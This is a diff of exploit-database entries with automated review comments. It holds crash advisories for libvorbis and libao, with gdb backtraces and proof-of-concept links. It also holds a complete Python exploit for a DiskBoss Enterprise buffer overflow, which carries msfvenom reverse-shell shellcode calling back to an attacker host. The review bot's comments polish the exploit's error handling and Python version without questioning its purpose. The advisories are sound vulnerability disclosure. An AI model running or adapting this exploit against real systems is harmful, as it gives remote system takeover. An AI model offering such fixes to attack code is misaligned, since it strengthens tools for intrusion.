%rdi,%r14 + 0x00007ffff61752a5 <+5>:push %r13 + 0x00007ffff61752a7 <+7>:push %r12 + 0x00007ffff61752a9 <+9>:push %rbp + 0x00007ffff61752aa <+10>:push %rbx + 0x00007ffff61752ab <+11>:mov 0xb8(%rdi),%r13 + 0x00007ffff61752b2 <+18>:callq 0x7ffff616b240 <_vorbis_block_ripcord@plt> + 0x00007ffff61752b7 <+23>:mov 0x70(%r14),%rdi + 0x00007ffff61752bb <+27>:test %rdi,%rdi + 0x00007ffff61752be <+30>:je 0x7ffff61752c5 +=> 0x00007ffff61752c0 <+32>:callq 0x7ffff616b130 + 0x00007ffff61752c5 <+37>:test %r13,%r13 + 0x00007ffff61752c8 <+40>:je 0x7ffff617530c + 0x00007ffff61752ca <+42>:mov $0x1,%r12d + 0x00007ffff61752d0 <+48>:xor %ebx,%ebx + 0x00007ffff61752d2 <+50>:jmp 0x7ffff61752df + 0x00007ffff61752d4 <+52>:nopl 0x0(%rax) + 0x00007ffff61752d8 <+56>:add $0x1,%ebx + 0x00007ffff61752db <+59>:add $0x1,%r12d + 0x00007ffff61752df <+63>:movslq %ebx,%rax +---Type to continue, or q to quit---q +Quit +(gdb) i r +rax 0x22 +rbx 0x61fca06421664 +rcx 0x00 +rdx 0x7ffff7ba6778140737349576568 +rsi 0x00 +rdi 0x80128 +rbp 0x7fffffffd4700x7fffffffd470 +rsp 0x7fffffffd4000x7fffffffd400 +r8 0x746e656d75636f008389754676633104128 +r9 
0x6143506374224 +r10 0x7fffffffd1f0140737488343536 +r11 0x7ffff61752a0140737322111648 +r12 0x6128506367312 +r13 0x00 +r14 0x6205606423904 +r15 0x7ffff7bcf146140737349742918 +rip 0x7ffff61752c00x7ffff61752c0 +eflags 0x202[ IF ] +cs 0x3351 +ss 0x2b43 +ds 0x00 +es 0x00 +fs 0x00 +---Type to continue, or q to quit--- +gs 0x00 +(gdb) ni + + +Program received signal SIGSEGV, Segmentation fault. +__GI___libc_free (mem=0x80) at malloc.c:2929 +2929malloc.c: No such file or directory. +(gdb) bt +#0 __GI___libc_free (mem=0x80) at malloc.c:2929 +#1 0x00007ffff61752c5 in vorbis_block_clear () + from /usr/local/lib/libvorbis.so.0 +#2 0x00007ffff65ac5ae in splt_ogg_v_free (oggstate=0x61fca0) at ogg.c:162 +#3 0x00007ffff65ace0b in splt_ogg_info (in=, + state=state@entry=0x60ddb0, error=error@entry=0x7fffffffdbf0) at ogg.c:545 +#4 0x00007ffff65acf75 in splt_ogg_get_info (state=state@entry=0x60ddb0, + file_input=, error=error@entry=0x7fffffffdbf0) at ogg.c:108 +#5 0x00007ffff65ae6c7 in splt_pl_init (state=0x60ddb0, error=0x7fffffffdbf0) + at ogg.c:1482 +#6 0x00007ffff7bcac16 in splt_tp_get_original_tags_and_append ( + error=0x7fffffffdbf0, state=0x60ddb0) at tags_parser.c:545 +#7 splt_tp_process_original_tags_variable (tpu=tpu@entry=0x61f800, + state=state@entry=0x60ddb0, error=error@entry=0x7fffffffdbf0, + set_original_tags=1) at tags_parser.c:514 +#8 0x00007ffff7bcb4d1 in splt_tp_process_tag_variable (error=0x7fffffffdbf0, + state=0x60ddb0, tpu=0x61f800, end_paranthesis=0x7ffff7bcf14c "]", + tag_variable_start=0x7ffff7bcf146 "o,@N=1]") at tags_parser.c:363 +#9 splt_tp_process_tags (error=0x7fffffffdbf0, state=0x60ddb0, tpu=0x61f800, + tags=0x7ffff7bcf143 "%[@o,@N=1]") at tags_parser.c:293 +#10 splt_tp_put_tags_from_string (state=state@entry=0x60ddb0, + tags=tags@entry=0x7ffff7bcf143 "%[@o,@N=1]", + error=error@entry=0x7fffffffdbf0) at tags_parser.c:192 +---Type to continue, or q to quit--- +#11 0x00007ffff7bbb4f3 in mp3splt_split (state=state@entry=0x60ddb0) + at mp3splt.c:1232 
+#12 0x0000000000403320 in main (argc=, + orig_argv=) at mp3splt.c:872 +(gdb) +-------------------- + int vorbis_block_clear(vorbis_block *vb){ + int i; + vorbis_block_internal *vbi=vb->internal; + + + _vorbis_block_ripcord(vb); + if(vb->localstore)_ogg_free(vb->localstore); <======== + + + if(vbi){ + for(i=0;ipacketblob[i]); + if(i!=PACKETBLOBS/2)_ogg_free(vbi->packetblob[i]); + } + _ogg_free(vbi); + } + memset(vb,0,sizeof(*vb)); + return(0); + } + + +POC: +libvorbis_1.3.5_null_pointer_dereference.ogg +CVE: +CVE-2017-11735 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42399.zip diff --git a/platforms/linux/dos/42400.txt b/platforms/linux/dos/42400.txt new file mode 100755 index 000000000..368fd7ff4 --- /dev/null +++ b/platforms/linux/dos/42400.txt 
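Review bot: The second finding is labelled a NULL pointer dereference, but the trace shows `__GI___libc_free (mem=0x80)`: `vb->localstore` holds the non-NULL value 0x80, passes the `if(vb->localstore)` check, and is handed to free(), which is an invalid-free bug class rather than a NULL dereference and is worth describing as such. Given the caller `splt_ogg_v_free` at ogg.c:162 in the backtrace, this looks like a vorbis_block being cleared without ever having been initialised, which would place the defect in mp3splt's error path rather than in `vorbis_block_clear`; that attribution should be confirmed before the bug is charged to libvorbis. The advisory should at least describe the crash as `invalid free of an apparently uninitialised vorbis_block (localstore == 0x80)` instead of a NULL pointer dereference.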
@@ -0,0 +1,62 @@ +libao memory corruption vulnerability +================ +Author : qflb.wu +=============== + + +Introduction: +============= +Libao is a cross-platform audio library that allows programs to output audio using a simple API on a wide variety of platforms. + + +Affected version: +===== +1.2.0 + + +Vulnerability Description: +========================== +the _tokenize_matrix function in audio_out.c in Xiph.Org libao 1.2.0 can cause a denial of service(memory corruption) via a crafted mp3 file. + + +I found this bug when I test mpg321 0.3.2 which used the libao library. + + +./mpg321 libao_1.2.0_memory_corruption.mp3 + + +----debug info:---- +Program received signal SIGSEGV, Segmentation fault. +_int_malloc (av=av@entry=0x7ffff6f7f760 , bytes=bytes@entry=3) + at malloc.c:3740 +3740malloc.c: No such file or directory. +(gdb) bt +#0 _int_malloc (av=av@entry=0x7ffff6f7f760 , bytes=bytes@entry=3) + at malloc.c:3740 +#1 0x00007ffff6c442cc in __libc_calloc (n=, + elem_size=) at malloc.c:3219 +#2 0x00007ffff728e189 in _tokenize_matrix () from /usr/local/lib/libao.so.4 +#3 0x00007ffff728e607 in _matrix_to_channelmask () + from /usr/local/lib/libao.so.4 +#4 0x00007ffff72906f2 in _open_device () from /usr/local/lib/libao.so.4 +#5 0x000000000040a6aa in open_ao_playdevice (header=header@entry=0x624af8) + at ao.c:411 +#6 0x0000000000407e50 in output (data=, header=0x624af8, + pcm=0x627f44) at mad.c:974 +#7 0x00007ffff749a85c in run_sync (decoder=0x7fffffffbc40) at decoder.c:439 +#8 0x00007ffff749ab38 in mad_decoder_run ( + decoder=decoder@entry=0x7fffffffbc40, + mode=mode@entry=MAD_DECODER_MODE_SYNC) at decoder.c:557 +#9 0x0000000000403d5d in main (argc=, argv=) + at mpg321.c:1092 +(gdb) + + +POC: +libao_1.2.0_memory_corruption.mp3 +CVE: +CVE-2017-11548 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42400.zip 
diff --git a/platforms/windows/remote/42395.py b/platforms/windows/remote/42395.py
new file mode 100755
index 000000000..c008579be
--- /dev/null
+++ b/platforms/windows/remote/42395.py
@@ -0,0 +1,117 @@
+#!/usr/bin/env python
+# Exploit Title: DiskBoss Enterprise v8.2.14 Remote buffer overflow
+# Date: 2017-07-30
+# Exploit Author: Ahmad Mahfouz
+# Author Homepage: www.unixawy.com
+# Vendor Homepage: http://www.diskboss.com/
+# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.2.14.exe
+# Version: v8.2.14
+# Tested on: Windows 7 SP1 x64
+# Category; Windows Remote Exploit
+# Description: DiskBoss Enterprise with management web-console enabled can lead to full system takeover.
+
+import socket,sys
+
+print "-----------------------------------------"
+print "- DiskBoss Enterprise v8.2.14 TakeOver -"
+print "- Tested on windows 7 x64 -"
+print "- by @eln1x -"
+print "-----------------------------------------"
+
+
+try:
+ target = sys.argv[1]
+except:
+ print "Usage ./DB_E_v8.2.14.py 192.168.1.2"
+ sys.exit(1)
+port = 80
+
+
+#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.72.136 LPORT=443 EXITFUN=none -e x86/alpha_mixed -f python
+shellcode = "\x89\xe0\xdd\xc0\xd9\x70\xf4\x58\x50\x59\x49\x49\x49"
+shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x6d\x38\x4c"
+shellcode += "\x42\x35\x50\x77\x70\x67\x70\x65\x30\x4b\x39\x6a\x45"
+shellcode += "\x36\x51\x59\x50\x61\x74\x6e\x6b\x70\x50\x56\x50\x4e"
+shellcode += "\x6b\x30\x52\x64\x4c\x6c\x4b\x71\x42\x72\x34\x6e\x6b"
+shellcode += "\x73\x42\x36\x48\x34\x4f\x58\x37\x70\x4a\x54\x66\x36"
+shellcode += "\x51\x6b\x4f\x4c\x6c\x57\x4c\x43\x51\x61\x6c\x44\x42"
+shellcode += "\x76\x4c\x45\x70\x69\x51\x78\x4f\x46\x6d\x65\x51\x59"
+shellcode += "\x57\x6d\x32\x4c\x32\x33\x62\x43\x67\x6c\x4b\x36\x32"
+shellcode += "\x74\x50\x4e\x6b\x61\x5a\x55\x6c\x4c\x4b\x30\x4c\x46"
+shellcode += "\x71\x43\x48\x68\x63\x67\x38\x55\x51\x6a\x71\x66\x31"
+shellcode += "\x4c\x4b\x42\x79\x37\x50\x55\x51\x6b\x63\x4e\x6b\x67"
+shellcode += "\x39\x66\x78\x6a\x43\x67\x4a\x37\x39\x6c\x4b\x37\x44"
+shellcode += "\x4c\x4b\x77\x71\x6e\x36\x36\x51\x49\x6f\x4c\x6c\x7a"
+shellcode += "\x61\x38\x4f\x36\x6d\x66\x61\x6a\x67\x55\x68\x59\x70"
+shellcode += "\x42\x55\x4a\x56\x76\x63\x43\x4d\x5a\x58\x37\x4b\x63"
+shellcode += "\x4d\x56\x44\x51\x65\x7a\x44\x43\x68\x6e\x6b\x31\x48"
+shellcode += "\x37\x54\x56\x61\x58\x53\x51\x76\x6e\x6b\x46\x6c\x62"
+shellcode += "\x6b\x6e\x6b\x61\x48\x65\x4c\x46\x61\x5a\x73\x4e\x6b"
+shellcode += "\x44\x44\x6c\x4b\x63\x31\x5a\x70\x4f\x79\x61\x54\x37"
+shellcode += "\x54\x34\x64\x31\x4b\x43\x6b\x33\x51\x66\x39\x61\x4a"
+shellcode += "\x70\x51\x79\x6f\x69\x70\x71\x4f\x31\x4f\x30\x5a\x6c"
+shellcode += "\x4b\x45\x42\x48\x6b\x4c\x4d\x31\x4d\x61\x78\x34\x73"
+shellcode += "\x57\x42\x75\x50\x43\x30\x73\x58\x72\x57\x61\x63\x67"
+shellcode += "\x42\x61\x4f\x73\x64\x61\x78\x50\x4c\x64\x37\x51\x36"
+shellcode += "\x34\x47\x69\x6f\x58\x55\x6d\x68\x5a\x30\x36\x61\x75"
+shellcode += "\x50\x53\x30\x64\x69\x4b\x74\x61\x44\x66\x30\x35\x38"
+shellcode += "\x66\x49\x4d\x50\x32\x4b\x65\x50\x39\x6f\x49\x45\x62"
+shellcode += "\x70\x50\x50\x56\x30\x42\x70\x67\x30\x70\x50\x67\x30"
+shellcode += "\x52\x70\x70\x68\x78\x6a\x36\x6f\x69\x4f\x49\x70\x69"
+shellcode += "\x6f\x4b\x65\x6f\x67\x62\x4a\x35\x55\x51\x78\x6b\x70"
+shellcode += "\x6e\x48\x67\x38\x6b\x38\x51\x78\x73\x32\x63\x30\x76"
+shellcode += "\x61\x4f\x4b\x4f\x79\x6a\x46\x33\x5a\x56\x70\x63\x66"
+shellcode += "\x71\x47\x71\x78\x5a\x39\x4c\x65\x31\x64\x35\x31\x39"
+shellcode += "\x6f\x78\x55\x6b\x35\x4b\x70\x52\x54\x64\x4c\x59\x6f"
+shellcode += "\x42\x6e\x73\x38\x44\x35\x5a\x4c\x70\x68\x5a\x50\x6f"
+shellcode += "\x45\x4e\x42\x73\x66\x59\x6f\x4a\x75\x30\x68\x35\x33"
+shellcode += "\x50\x6d\x32\x44\x75\x50\x4f\x79\x69\x73\x73\x67\x70"
+shellcode += "\x57\x32\x77\x55\x61\x49\x66\x51\x7a\x64\x52\x61\x49"
+shellcode += "\x70\x56\x7a\x42\x49\x6d\x70\x66\x4b\x77\x33\x74\x66"
+shellcode += "\x44\x67\x4c\x77\x71\x53\x31\x6e\x6d\x37\x34\x65\x74"
+shellcode += "\x34\x50\x39\x56\x73\x30\x33\x74\x62\x74\x52\x70\x61"
+shellcode += "\x46\x33\x66\x76\x36\x30\x46\x36\x36\x62\x6e\x32\x76"
+shellcode += "\x50\x56\x66\x33\x43\x66\x71\x78\x71\x69\x5a\x6c\x77"
+shellcode += "\x4f\x4c\x46\x4b\x4f\x5a\x75\x6e\x69\x59\x70\x62\x6e"
+shellcode += "\x30\x56\x67\x36\x6b\x4f\x30\x30\x31\x78\x55\x58\x6c"
+shellcode += "\x47\x45\x4d\x71\x70\x59\x6f\x6b\x65\x4d\x6b\x38\x70"
+shellcode += "\x38\x35\x6e\x42\x76\x36\x50\x68\x69\x36\x6f\x65\x6d"
+shellcode += "\x6d\x6d\x4d\x6b\x4f\x6b\x65\x47\x4c\x36\x66\x63\x4c"
+shellcode += "\x75\x5a\x4f\x70\x6b\x4b\x4b\x50\x50\x75\x57\x75\x6f"
+shellcode += "\x4b\x43\x77\x62\x33\x70\x72\x32\x4f\x50\x6a\x75\x50"
+shellcode += "\x42\x73\x6b\x4f\x39\x45\x41\x41"
+
+payload = shellcode
+payload += 'A' * (2492 - len(payload))
+
+payload += '\xEB\x10\x90\x90' # NSEH: First Short JMP
+payload += '\xCA\xA8\x02\x10' # SEH : POP EDI POP ESI RET 04 libpal.dll
+payload += '\x90' * 10
+payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode
+
+
+payload += 'D' * (5000-len(payload))
+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+try:
+ s.connect((target,port))
+ print "[*] Connection Success."
+except:
+ print "Connction Refused %s:%s" %(target,port)
+ sys.exit(2)
+
+
+packet = "GET /../%s HTTP/1.1\r\n" %payload
+packet += "Host: 4.2.2.2\r\n"
+packet += "Connection: keep-alive\r\n"
+packet += "Paragma: no-cache\r\n"
+packet += "Cahce-Control: no-cache\r\n"
+packet += "User-Agent: H4X0R\r\n"
+packet += "Referer: http://google.com\r\n"
+packet += "\r\n"
+
+print "[*] Get nt authority or die hard"
+s.send(packet)
+s.close()
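Review bot: Both `except:` clauses — the one around `sys.argv[1]` and the one around `s.connect` — are bare, so they also catch `KeyboardInterrupt` and `SystemExit` and report a Ctrl-C during connect as "Connction Refused"; narrow them to `except IndexError:` and `except socket.error:`. The shebang `#!/usr/bin/env python` combined with Python 2 `print` statements and byte-valued `'\xCA\xA8\x02\x10'` string literals means the script fails at parse time when `python` resolves to Python 3; the header should state Python 2 or the shebang should read `#!/usr/bin/env python2`. The header names `Paragma` and `Cahce-Control` and the message `Connction Refused` look like typos rather than intent and deserve either a fix or a comment saying they are deliberate.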